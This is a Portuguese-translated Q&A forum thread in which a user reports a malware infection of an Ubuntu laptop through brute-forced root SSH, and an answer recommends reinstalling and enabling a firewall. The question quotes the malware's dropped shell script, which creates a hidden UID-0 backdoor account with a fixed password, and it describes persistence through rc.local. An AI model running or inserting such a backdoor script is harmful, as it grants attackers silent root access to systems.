Como lidar com malware no meu laptop?

12

Tenho quase certeza de que meu laptop Ubuntu 13.10 está infectado com algum tipo de malware.

De vez em quando, eu encontro um processo / lib / sshd (de propriedade do root) rodando e consumindo muita CPU. Não é o servidor sshd que executa o / usr / sbin / sshd.

O binário possui permissões --wxrw-rwt e gera e gera scripts no diretório / lib. Um recente é chamado 13959730401387633604 e faz o seguinte

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

O usuário gusr foi criado pelo malware de forma independente e, em seguida, o chpasswd trava ao mesmo tempo em que consome 100% de cpu.

Até agora, identifiquei que o usuário gusr foi adicionalmente adicionado aos arquivos em / etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Parece que o malware fez cópias de todos esses arquivos com o sufixo "-". A lista completa de arquivos / etc / que foram modificados pelo root está disponível aqui .

Além disso, o arquivo / etc / hosts foi alterado para este .

O / lib / sshd começa adicionando-se ao final do arquivo /etc/init.d/rc.local!

Eu removi o usuário, removi os arquivos, matei a árvore processada, mudei minhas senhas e removi as chaves públicas ssh.

Estou ciente de que estou basicamente ferrado e provavelmente reinstalarei todo o sistema. No entanto, como faço login em várias outras máquinas, seria bom, pelo menos, tentar removê-lo e descobrir como obtive isso. Qualquer sugestão sobre como fazer isso seria apreciada.

Parece que eles entraram no dia 25 de março com login de root forçado. Eu não tinha idéia que o root ssh é habilitado por padrão no Ubuntu. Eu desabilitei e coloquei denyhosts.

O login era de 59.188.247.236, aparentemente em algum lugar de Hong Kong.

Eu peguei o laptop do EmperorLinux e eles ativaram o acesso root. Se você tiver um desses e estiver executando o sshd, tenha cuidado.

    
por Dejan Jovanović 30.03.2014 / 03:29

1 resposta

11

Primeiro, tire essa máquina da rede agora!

Em segundo lugar, por que você tem a conta root ativada? Você realmente não deve ativar a conta root, a menos que tenha uma boa razão para fazê-lo.

Em terceiro lugar, sim, a única maneira de ter certeza de que você está limpo é fazer uma instalação limpa. Também é aconselhável que você comece de novo e não volte a fazer backup, pois você nunca pode ter certeza de quando tudo começou.

Também sugiro que você configure um firewall na próxima instalação e negue todas as conexões de entrada:

sudo ufw default deny incoming

e, em seguida, permitir ssh com:

sudo ufw allow ssh

e NÃO ative a conta root! Certamente certifique-se de que o login root ssh esteja desativado.

    
por Seth 30.03.2014 / 06:12